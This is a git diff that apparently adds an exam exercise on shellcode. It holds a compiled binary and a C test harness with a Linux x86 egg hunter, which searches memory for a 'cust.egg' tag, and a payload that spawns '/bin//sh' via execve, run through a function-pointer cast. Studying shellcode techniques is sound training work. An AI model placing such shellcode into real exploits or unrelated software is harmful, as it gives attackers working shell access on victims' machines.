diff --git a/exam3/shellcode b/exam3/shellcode new file mode 100755 index 0000000000000000000000000000000000000000..a6b04845c29dd39a7732e37e981c45fc03bdb727 GIT binary patch literal 5108 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 L74pN3oLTW-w_ec{ literal 0 HcmV?d00001 diff --git a/exam3/shellcode.c b/exam3/shellcode.c new file mode 100644 index 0000000..8e1c0fd --- /dev/null +++ b/exam3/shellcode.c @@ -0,0 +1,18 @@ +#include +#include + +unsigned char hunter[] = "\xeb\x1e\x58\x40\x81\x78\xf8\x63\x75\x73\x74\x75\xf6\x81\x78\xfc\x2e\x65\x67\x67\x75\xed\xff\xd0\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdd\xff\xff\xff"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x63\x75\x73\x74\x2e\x65\x67\x67\x31\xc9\xb1\x08\x48\xe2\xfd\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +}